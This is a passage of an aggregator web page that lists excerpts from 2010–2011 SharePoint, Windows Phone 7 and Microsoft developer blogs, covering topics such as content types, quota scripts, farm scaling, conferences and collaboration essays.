<div class="entry-bound">PrincipleAny application or solution built in SharePoint must use a custom content type over adding columns to lists. The only exception to this is one-off solutions that have no life-cycle, proof-of-concepts, etc.Creating Content TypesWeb UI. Not portable, POC onlyC# or Declarative (XML). Must deploy these as FeaturesRuleDo not chagne the base XML for a Content Type after deploying. The only exception to this rule is that you can re-deploy a modified Content Type definition only after completely removing it from the environment (either programatically or by hand).Updating Content TypesUpdate&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/bsimser/~3/eDed5I3w4Y4/pet-peeves-with-the-windows-phone-7-marketplace.aspx" rel="bookmark" target="_blank">Pet Peeves with the Windows Phone 7 Marketplace</a></h3>

<div class="full-post">
<div class="author">Bil Simser</div>
<div class="published">13 Feb 2011 | 11:44 am</div>
<div class="entry-content">
<div class="entry-bound">Have you ever noticed how something things just gnaw at your very being. This is the case with the WP7 marketplace, the Zune software, and the things that drive me batshit crazy with a side of fries. To go. I wanted to share. XBox Live is Not the Centre of the Universe Okay, it...s fine that the Zune software has an XBox live tag for games so can see them clearly but do we really need to have it shoved down our throats. On every click? Click on Games in the marketplace: The first thing that it defaults to on the filters on the right is XBox Live: Okay. Fine. However if you change it (say to&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/bsimser/~3/cwInADlMLfQ/applying-quotas-across-all-my-sites.aspx" rel="bookmark" target="_blank">Applying Quotas Across all My Sites</a></h3>

<div class="full-post">
<div class="author">Bil Simser</div>
<div class="published">31 Jan 2011 | 7:17 am</div>
<div class="entry-content">
<div class="entry-bound">Just a quick snippet this morning. If you need to apply a new quota template to all users My Sites here's a quick script to do it. Changing an existing quota is fine but if you're migrating users from another system or you just want to up everyone's storage a bit here's what you do. Create a new quota template. This is found in Central Admin under Application Management | Site Collections | Specify quota templates. There's already a default "Individual Quota" created you might want to create your own or have a special one for your users Open&nbsp;up the PowerShell&nbsp;Management Console&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/bsimser/~3/1m-AW6LxAfw/imperative-vs-linq-performance-on-wp7.aspx" rel="bookmark" target="_blank">Imperative vs. LINQ Performance on WP7</a></h3>

<div class="full-post">
<div class="author">Bil Simser</div>
<div class="published">27 Jan 2011 | 7:05 am</div>
<div class="entry-content">
<div class="entry-bound">Jesse Liberty had a nice post presenting the concepts around imperative, LINQ and fluent programming to populate a listbox. Check out the post as it...s a great example of some foundational things every .NET programmer should know. I was more interested in what the IL code that would be generated from imperative vs. LINQ was like and what the performance numbers are and how they differ. The code at the instruction level is interesting but not surprising. The imperative example with it...s creating lists and loops weighs in at about 60 instructions. 1: .method private hidebysig instance void&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/bsimser/~3/_WL5b8QJMlE/generic-pop-and-push-for-list-lt-t-gt.aspx" rel="bookmark" target="_blank">Generic Pop and Push for List</a></h3>

<div class="full-post">
<div class="author">Bil Simser</div>
<div class="published">13 Jan 2011 | 8:21 am</div>
<div class="entry-content">
<div class="entry-bound">Here's a little snippet I use to extend a generic List class to have similar capabilites to the Stack class. The Stack&lt;T&gt; class is great but it lives in its own world under System.Object. Wouldn't it be nice to have a List&lt;T&gt; that could do the same? Here's the code: 1: public static class ExtensionMethods 2: { 3: public static T Pop&lt;T&gt;(this List&lt;T&gt; theList) 4: { 5: var local = theList[theList.Count - 1]; 6: theList.RemoveAt(theList.Count - 1); 7: return local; 8: } 9: &nbsp; 10: public static void Push&lt;T&gt;(this List&lt;T&gt; theList, T item) 11: { 12:&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11122" class="feed-block 265b70a1d4d3a7d6ded26b37721ced7a">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.sharepointbuzz.com" target="_blank" class="snap_shots">SharePoint Buzz</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointBuzz/~3/78weWCzuUOo/register-for-sharepoint-conference-2011-spc11.aspx" rel="bookmark" target="_blank">Register for SharePoint Conference 2011 #spc11</a></h3>

<div class="full-post">
<div class="author">SharePointBuzz</div>
<div class="published">8 Mar 2011 | 3:44 am</div>
<div class="entry-content">
<div class="entry-bound">One conference to go this year, is the SharePoint Conference 2011... It...s the premier conference dedicated to SharePoint, SharePoint Online and related technologies. SharePoint Conference 2011 will be the only conference to hear experts from Microsoft and around the world share their experience and knowledge about a variety topics such as cloud services, best practices &amp; real world project insights. The session content will cover products including SharePoint and SharePoint Online as part of the soon to be released Office 365. [from&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointBuzz/~3/4dIs1CIS4vA/latest-sharepoint-posts...march-8th-2011.aspx" rel="bookmark" target="_blank">Latest SharePoint Posts...March 8th 2011</a></h3>

<div class="full-post">
<div class="author">SharePointBuzz</div>
<div class="published">8 Mar 2011 | 2:44 am</div>
<div class="entry-content">
<div class="entry-bound">Here...s the latest SharePoint blogs that have just been published: Delayed February 2011 CU for SharePoint 2010 is now available announcement by Stefan Go..ner ... thank you! KB 2475886 - WSS 3.0 KB 2475885 - MOSS 2007 KB 2475880 - SharePoint Foundation 2010 KB 2475878 - SharePoint Server 2010 KB 2475879 - SharePoint Server 2010 with Project Server Corey Roth MVP posts a quick look at SharePoint Online in Office 365 on how to setup SharePoint Online as well as answers some common questions Considering moving to the cloud, here...s what some reasons customers might have not to moved to Office&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointBuzz/~3/SrgDHmNDOt8/sharepoint-saturday-toronto-2010-call-for-speakers-open.aspx" rel="bookmark" target="_blank">SharePoint Saturday Toronto 2010 - Call for Speakers OPEN!</a></h3>

<div class="full-post">
<div class="author">SharePointBuzz</div>
<div class="published">14 Sep 2010 | 12:19 pm</div>
<div class="entry-content">
<div class="entry-bound">If you are not familiar with SharePoint Saturday events, they are free community-focused SharePoint events dedicated to educating and engaging members of the local technical community. Call for Speakers OPEN Please download the Speaker Submission form. Fill it out and email your completed form to spstoronto@sharepointdelivery.com The..2nd SharePoint Saturday Toronto event is being held in Toronto on November 13th, 2010. Join SharePoint architects, developers, and other professionals that work with Microsoft Office SharePoint Server 2007 for ...SharePoint Saturday..., on Saturday, November&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointBuzz/~3/zVce0k9soSk/should-i-install-office-2010-64-bit-or-32-bit.aspx" rel="bookmark" target="_blank">Should I Install Office 2010 64-bit or 32-bit?</a></h3>

<div class="full-post">
<div class="author">SharePointBuzz</div>
<div class="published">10 Jul 2010 | 2:49 am</div>
<div class="entry-content">
<div class="entry-bound">Microsoft Office 2010 is the first version of office that will ship in both 32-bit (x86) and 64-bit (x64) flavors. If you are running a 32-bit version of Windows, you can only use a 32-bit version of Office. However, on x64 Windows, you can decide to install either 32-bit Office or 64-bit Office, but not both. Microsoft has just published an article which helps you make that decision. In short, I recommend installing the 32-bit Office, even on 64-bit Windows... Unless you have special needs that require the use of 64-bit Office apps. For example, one of the cases where 64-bit helps is working&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointBuzz/~3/RKcs6mH8en8/expand-vmware-virtual-machine-hard-drive.aspx" rel="bookmark" target="_blank">Expand VMware Virtual Machine Hard Drive</a></h3>

<div class="full-post">
<div class="author">SharePointBuzz</div>
<div class="published">10 Jul 2010 | 2:44 am</div>
<div class="entry-content">
<div class="entry-bound">Recently, I had the need to expand my virtual machine hard drive... Initially when I had created the virtual machine, I had only allocated 16GB of hard drive space... That quickly filled up... Clean up virtual hard drive space via Windows OS using Disk Cleanup Shutdown your virtual machine Go to Virtual Machine Settings Select Hard Disk From Utilities drop down menu, and do the following: Defragment the hard drive Compact the hard drive Expand the hard drive Within the Expand Disk Capacity window, enter the maximum disk size (ex. 50GB) Click Expand Once the disk has been successfully&hellip;</div>
</div>
</div>

</li>
</ul>
<div id="ad-3" class="ad-unit feed-block"><script type='text/javascript'><!--// <![CDATA[OA_show('slot_9_300_250');// ]]> --></script></div>
<div class="row-clear">&nbsp;</div>
<ul id="feed11123" class="feed-block c9e39817a09aa2611cd8568720fa2259">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://sharepointsolutions.blogspot.com/" target="_blank" class="snap_shots">SharePoint Solutions Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointSolutionsBlog/~3/2-pHurkv2LU/your-entrance-ramp-to-understanding-and.html" rel="bookmark" target="_blank">Your Entrance Ramp to Understanding and Using SharePoint Server 2010</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">25 Feb 2011 | 9:52 am</div>
<div class="entry-content">
<div class="entry-bound">Your task: Understand SharePoint Server 2010 and learn to use it effectively in your work.But how do you get there? Where is the entrance ramp?SharePoint Solutions is pleased to announce our brand new introductory course in the basics of SharePoint Server 2010. Introduction to SharePoint 2010 ... Using SharePoint Server 2010 is a 4-day hands-on course on the basic concepts and basic features of SharePoint Server 2010. The course covers the features common to all editions of SharePoint 2010 (both free and paid-for), and then reveals the powerful additional functionality that only the paid-for&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointSolutionsBlog/~3/ALFy0C-17DI/how-to-scale-out-sharepoint-2010-farm.html" rel="bookmark" target="_blank">How to Scale Out a SharePoint 2010 Farm From Two-Tier to Three-Tier by Adding a Dedicated Application Server</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">7 Feb 2011 | 9:59 am</div>
<div class="entry-content">
<div class="entry-bound">Three-Tier SharePoint Farm Microsoft provides some good documentation on different SharePoint 2010 Farm deployment scenarios in the TechNet Library. &nbsp;One of those is about how to deploy a three-tier SharePoint 2010 Farm, which is the second most common topology for a SharePoint farm. But, I couldn't find anything on TechNet that walked through how to "scale out" to a three-tier SharePoint 2010 Farm from an existing two-tier SharePoint 2010 Farm (the most common SharePoint Farm topology). A lot of SharePoint Server Farm Administrators eventually get to the point where they need to scale&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointSolutionsBlog/~3/TjW4nFKCqmI/sharepoint-2010-social-networking-part_21.html" rel="bookmark" target="_blank">SharePoint 2010 Social Networking: Part 5b - Bookmarking and Tagging User Experience</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">21 Jan 2011 | 4:16 pm</div>
<div class="entry-content">
<div class="entry-bound">&#160; This post is Part 5b of my SharePoint 2010 Social Networking series.&#160; The other parts of Part 5 are all related to the Social Bookmarking and Tagging features of SharePoint 2010: Part 5a - Intro and Central Database of Bookmarks and Tags For All Users Part 5b - Bookmarking and Tagging User Experience &lt; You are here Part 5c - Browsing Bookmarks and Tags Part 5d - Searching Bookmarks and Tags (Note: For the first post of the SharePoint 2010 Social Networking series and a table of contents, go here.) Feature: Bookmarking and Tagging User Experience How does the end user go about&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointSolutionsBlog/~3/kgENKV0ACkQ/sharepoint-2010-social-networking-part.html" rel="bookmark" target="_blank">SharePoint 2010 Social Networking: Part 5a - Bookmarking and Tagging Database</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">21 Jan 2011 | 3:58 pm</div>
<div class="entry-content">
<div class="entry-bound">In this post, I will dive into the details of the social bookmarking and tagging features of SharePoint 2010.&#160; As I said in a previous post, my aim with this series on SharePoint 2010 Social Computing is to bring a new level of enlightenment to how the features have been designed to work, their intended use, and benefits. I am actually going to break this discussion up into four separate posts because of the depth of the subject area and the investment Microsoft has made in the features.&#160; The work that Microsoft has done to enable social bookmarking and tagging within SharePoint&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/SharepointSolutionsBlog/~3/xukCxrc_Wy4/just-released-our-cool-new-site.html" rel="bookmark" target="_blank">Just Released: Our Cool New Site Provisioning and Governance Tool</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">19 Jan 2011 | 2:48 pm</div>
<div class="entry-content">
<div class="entry-bound">SharePoint Solutions is pleased to announce the release of our newest SharePoint 2010 software add-on, Site Provisioning and Governance Assistant for SharePoint 2010 (SPGA 2010). The ...cool factor... on this one is off the charts and you...re going to want to check it out. As an IT professional, you know how hard it can be to maintain the kind of control you want on SharePoint 2010 sites. New sites propagate like bunnies and can quickly get out of hand, often leaving you with a backlog of work to get them approved, created and provisioned the way you want ... keeping your organization...s&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11127" class="feed-block a36a806c9131bc94774d3292ae2c122a">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://bobmixon.com" target="_blank" class="snap_shots">Mastering SharePoint with Bob Mixon</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://bobmixon.com/?p=85" rel="bookmark" target="_blank">SharePoint 2007/2010 Add-in Product for MindManager</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">1 Mar 2011 | 1:11 pm</div>
<div class="entry-content">
<div class="entry-bound">If you have ever followed any of my blog posts, seen me at any conferences speaking or worked with me, you know I am a huge fan of Mindjet&#8217;s MindManager product..as a..planning, design, architecture, project management and communications tool... Its simply an amazing product... If you haven&#8217;t ever used MindManager from Mindjet, I highly recommend you take a look at it. I just learned today that ShareSquared has a very cool SharePoint 2007/2010 add-in for MindManager... As I just became aware of the product, I am not familiar with all of it&#8217;s features yet... However, it&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://bobmixon.com/?p=82" rel="bookmark" target="_blank">SharePoint 2010 AAM...s, DNS and Proxies</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">8 Nov 2010 | 3:32 pm</div>
<div class="entry-content">
<div class="entry-bound">I went through a whirlwind learning experience with regards to SharePoint 2010 AAM&#8217;s, DNS and Proxy configuration at a customer&#8217;s site today... Thought I would share my findings and some simple resolutions to problems I encountered. In a nut-shell, we have a Web Front-end (WFE) server named sharepointvm... Up to today, we have been performing all installation and configurations using that server name; i.e. sharepointvm... This SharePoint 2010 enironment contains many Web Applications and Site Collections, so before going live, we wanted to simplify user interaction and have them&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://bobmixon.com/?p=79" rel="bookmark" target="_blank">MindManager v9</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">5 Nov 2010 | 1:49 pm</div>
<div class="entry-content">
<div class="entry-bound">As many of you know, I am a huge fan of Mindjet&#8217;s MindManager product... I use it daily for meetings, gathering my thoughts around a topic, presentations and SharePoint design... If you have never used it, I highly recommend taking a look at it. One of the many available features is the ability to add custom properties to any map topic... When I first started using MindManager v9, this functionality was excluded from the ribbon bar... I thought Mindjet had removed this functionality completely; which somewhat depressed me and I sent their support an e-mail asking why&#8230;.. I later&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://bobmixon.com/?p=75" rel="bookmark" target="_blank">SharePoint Design: CSF #3 ... Trust: Giving users a sense of trust with in the information they are using</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">21 Oct 2010 | 8:40 am</div>
<div class="entry-content">
<div class="entry-bound">Many do not realize the bridge business users must traverse when moving their documents from local drives and file shares to a new document management solution; this can be overwhelming to many... Thus it is imperative to implement a solution that promotes consistent trust in the technology... If users find the solution difficult to use, they tend to revert to ...what worked in the past.... One goal of most document management solution implementations is to reduce the amount of document duplication in an organization... For this to become a reality, users must trust your document management&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://bobmixon.com/?p=70" rel="bookmark" target="_blank">SharePoint Design: CSF #2 ... Findability: Promote the dissemination of information (content) through navigation, aggregate views, dashboards and search</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">19 Oct 2010 | 11:34 am</div>
<div class="entry-content">
<div class="entry-bound">The term ...findability... refers to a solution that provides meaningful and accurate information to consumers (personas) that proactively supports business decisions. Once CSF #1, simplify the storage and management of content, has been addressed and solved, it will then be important to aggregate, disseminate and deliver that information to consumers in a meaningful and accurate manner. At a minimum, findability should address the following: A consistent taxonomy for navigation through sites and content. Aggregate views of information to support common business contextual needs. Produce&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11128" class="feed-block 3451c841f8ebe2638a3555b7ca4de7bd">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.blogger.com/profile/03901751169502117735" target="_blank" class="snap_shots">JOPX on SharePoint 2010, SharePoint 2007 and Windows Phone 7</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Jopx/~3/80AJyc2bujo/installing-client-side-tfs-certificate.html" rel="bookmark" target="_blank">Installing client side TFS certificate on Windows 7</a></h3>

<div class="full-post">
<div class="author">jopx</div>
<div class="published">1 Mar 2011 | 11:11 am</div>
<div class="entry-content">
<div class="entry-bound">Apparently with Windows 7 you can...t simply use the wizard to import the client certificates for Team Foundation Server connections. You will need to do this manually. Open Internet Explorer and go to Internet Options. Select Content and next the Certificates tab. Select Trusted Root Certification authorities when importing the certificate. Tags van Technorati: windows+7,development,microsoft,visual+studio,TFS,team+foundation+server</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Jopx/~3/1-ABZjFNwOk/search-suggestions-in-sharepoint-2010.html" rel="bookmark" target="_blank">Search suggestions in SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">jopx</div>
<div class="published">28 Feb 2011 | 11:11 am</div>
<div class="entry-content">
<div class="entry-bound">One of the new features for end users with SharePoint 2010 is that suggestions are provided while you are typing a search query - for a complete list of enhancements - check out ... What...s new in Enterprise search(SharePoint Server 2010) . Now if you want to force these suggestions for demo scenario...s you can use some powershell scripts ... the next code sample is meant to be used in a setup with Fast Search 2010: $SearchApp = Get-SPEnterpriseSearchServiceApplication &quot;FAST Query SSA&quot; New-SPEnterpriseSearchLanguageResourcePhrase -SearchApplication $SearchApp -Language En-Us -Type&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Jopx/~3/YoF49oVPDQw/collaboration-enterprise-20-knowledge.html" rel="bookmark" target="_blank">Collaboration, Enterprise 2.0, Knowledge Management NextGen and digital marketing</a></h3>

<div class="full-post">
<div class="author">jopx</div>
<div class="published">10 Jan 2011 | 12:21 pm</div>
<div class="entry-content">
<div class="entry-bound">One of my predictions for 2011 is that we will finally witness the boom or bust of social media apps within the enterprise for the Belux market. Here...s some background info that might get you thinking Second wave smart working : what role HRM? Collaboration by Design Knowledge management is not just information delivery and just in time is not enough Social Media is dead ... Long live common sense&#160; Social media in product management This is one of my pet peeves&#160; about which I have written a couple of blog posts: Enterprise 2.0 and organizational culture Knowledge and talent in a&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Jopx/~3/S82hGkPeHdk/web-content-management-in-sharepoint.html" rel="bookmark" target="_blank">Web Content Management in SharePoint 2010 ... some random links</a></h3>

<div class="full-post">
<div class="author">jopx</div>
<div class="published">10 Jan 2011 | 12:15 pm</div>
<div class="entry-content">
<div class="entry-bound">Mental reminder ... check out this collection of links about Web Content Management in SharePoint 2010 Introducing web content management in SharePoint 2010 Introducing web analytics in SharePoint 2010 Accessibility and SharePoint 2010&#160; Web Authoring in SharePoint 2010 How to apply corporate branding (themes) to all SharePoint 2010 team sites Web Analytics in SharePoint 2010 ... Insights into reports&#160; View changes makes in-browser content localization easier What...s new with the content query web part&#160; Technorati Tags: sharepoint+2010,sps2010,sharepoint,wcm,development</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Jopx/~3/QTtLjOJI6h0/porting-oauth-with-silverlight-for.html" rel="bookmark" target="_blank">Porting oAuth with Silverlight for Windows Phone 7 to RTM version</a></h3>

<div class="full-post">
<div class="author">jopx</div>
<div class="published">10 Jan 2011 | 12:13 pm</div>
<div class="entry-content">
<div class="entry-bound">Recently I stumbled upon this interesting blog post Windows Phone 7 with Twitter which showed how to use oAuth on Windows Phone 7 but it was unfortunately built with the beta versions of Windows Phone 7. As an exercise I decided to upgrade the code to get it to work with the RTM release. Some things which needed fixing or which bugged me during the upgrade You will need to remove references to Microsoft.Phone.Controls, Microsoft.Phone.Controls.Navigation, Microsoft.Phone.Controls.WebBrowser, Microsoft.Controls.WebBrowser.interop. Don...t forget to to change the namespace declarations in the&hellip;</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11130" class="feed-block d01574d0e1af49b1e1e0a60527c0d6de">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.blogger.com/profile/10022906552670607366" target="_blank" class="snap_shots">Chris O'Brien</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/ChrisObrien/~3/1GL3wQxBseM/camlnet-intellisense-now-with-added.html" rel="bookmark" target="_blank">CAML.Net Intellisense ... now with added Feature upgrade schema</a></h3>

<div class="full-post">
<div class="author">Chris O'Brien</div>
<div class="published">17 Feb 2011 | 1:50 pm</div>
<div class="entry-content">
<div class="entry-bound">Although many SharePoint developers working with SP2010 are now aware of how useful vital CKS:Dev is, I fear that far fewer are also using John Holliday...s excellent CAML.Net Intellisense. I love this project so much I decided to contribute. If you...re not aware of the tool, the idea is to make it easier to work with the many XML files involved with SharePoint development. It does this by providing detailed documentation ...as you type... on the many XML attributes and elements, which so often you...d have open in a separate browser window onto the MSDN docs. There are two huge benefits&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11132" class="feed-block c9010c56cd0c626d1fc10228db979cc3">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.cleverworkarounds.com" target="_blank" class="snap_shots">CleverWorkarounds</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/cleverworkarounds/VURr/~3/a56BIN0xx5o/" rel="bookmark" target="_blank">A brief sojourn into the world of Exchange 2010</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">16 Feb 2011 | 12:17 pm</div>
<div class="entry-content">
<div class="entry-bound">Okay so this post is going to seem way out of place because it has utterly nothing to do with SharePoint and instead focuses on Microsoft Exchange Server. To explain why I have to give you a quick history lesson. Before I was a SharePoint guy, I was a networking, infrastructure and security guy. In fact I met and worked with Jeremy Thake before either of us were full-time SharePoint guys. If you were to ask him I...m sure he would tell you I was a bit of an infrastructure and security nazi back then. What warms my heart though is that since then I have mellowed out and now Jeremy has taken on&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/cleverworkarounds/VURr/~3/R9AvEqNCl9w/" rel="bookmark" target="_blank">Exciting news for Governance and Information Architecture classes</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">9 Feb 2011 | 6:18 pm</div>
<div class="entry-content">
<div class="entry-bound">Hi all I just thought I would check-in with some updates on happenings and some upcoming travels. In less then 2 weeks now, I will be in London with Andrew Woodward and Ant Clay of 21apps for the second SharePoint Governance and Information Architecture Master Class. There are still places available on this class so if you have been thinking about attending, now is the time to act. Also in Europe, a class is being run in Utrecht, Netherlands in May by Ant Clay. I am proud to be chosen to be a keynote speaker at the Australian SharePoint conference in Sydney in March. I am still wondering if I&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/cleverworkarounds/VURr/~3/FAc40FsKgt0/" rel="bookmark" target="_blank">The facets of collaboration part 4...BPM vs. HPM</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">1 Feb 2011 | 6:05 am</div>
<div class="entry-content">
<div class="entry-bound">Hi all and welcome to part four of my series on unpacking this buzzword phenomenon that is ...collaboration.... Like it or not, Collaboration is a word that is very in-vogue right now. I see it being used all over the place, particularly as a by-product of the success of x2.0 tools and technologies. Yet if you do your research, most of the values being espoused actually hark back to the 1950...s and even earlier. (More on that topic in my forthcoming Beyond Best Practices book). As it happens, Dilbert is quite a useful buzzword KPI. Once a buzzword graces a Scott Adams cartoon, you know that&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/cleverworkarounds/VURr/~3/Ia7wgFfmpIg/" rel="bookmark" target="_blank">The facets of collaboration Part 3...The feature jigsaw</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">25 Jan 2011 | 12:45 am</div>
<div class="entry-content">
<div class="entry-bound">Hi all and welcome to part three of my series on unpacking this mysterious phenomenon known as collaboration. In case you missed the first two articles (and I highly suggest that you read part 1 and part 2), I spent some 500 odd hours last year developing a SharePoint Governance and Information Architecture course. Amongst the sweat and tears of that particular endeavour, I researched many papers and online articles that attempt to look at the multitude of factors and variables that impact on collaborative scenarios where SharePoint might be leveraged. I also talked about Robot-Barbie, which&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/cleverworkarounds/VURr/~3/cl5zWCBrBSE/" rel="bookmark" target="_blank">The facets of collaboration Part 2...Enter the matrix!</a></h3>

<div class="full-post">
<div class="author">admin</div>
<div class="published">19 Jan 2011 | 7:31 am</div>
<div class="entry-content">
<div class="entry-bound">Hi all In my first post in this series, I introduced you ...Jane... and a true story about her missteps when implementing popular social networking technologies within her organisation. We then asked some deep and ponderous questions, before meeting Robot Barbie and the crazy world of SharePoint Robot Barbie solutions. Finally I outlined a simple mental model that I developed that I have found to be quite a useful method to look at collaboration more holistically and help with the user engagement and information architecture aspects of SharePoint governance. Now before we start, I want to&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11133" class="feed-block c9b1884d443fb746c3bc7977f00a0bdd">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.cjvandyk.com/blog/Lists/Posts/AllPosts.aspx" target="_blank" class="snap_shots">Brain Dump: Posts</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.cjvandyk.com/blog/Lists/Posts/ViewPost.aspx?ID=315" rel="bookmark" target="_blank">Now powered by SharePoint Foundation 2010</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">20 Feb 2011 | 5:53 am</div>
<div class="entry-content">
<div class="entry-bound">Body: The ice storm the other day not only knocked out my servers but also caused one of my raid arrays to die and temporarily take this blog down... I decided to pull forward my migration plans for the blog... I had planned to migrate my blog to SharePoint 2010 in the spring, but Icepocalypse 2011 forced me to bring those plans forward. My blog used to run on an old server (physical hardware) that was 4 years old... I had actually gone through the process of virtualizing it 2 years ago and I had it running on Virtual PC on top of a Window Server 2008 R2 machine at the time... When the raid&hellip;</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11134" class="feed-block ac1eca43e1e129aee93316d096eb47ee">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.sharepointjoel.com/Lists/Posts/AllPosts.aspx" target="_blank" class="snap_shots">SharePoint Joel's SharePoint Land</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/JoelsSharepointLand/~3/6db9pV2X9zU/ViewPost.aspx" rel="bookmark" target="_blank">Sharing the Point Asia Tour Begins Next Week!</a></h3>

<div class="full-post">
<div class="author"></div>
<div class="published">1 Mar 2011 | 11:49 am</div>
<div class="entry-content">
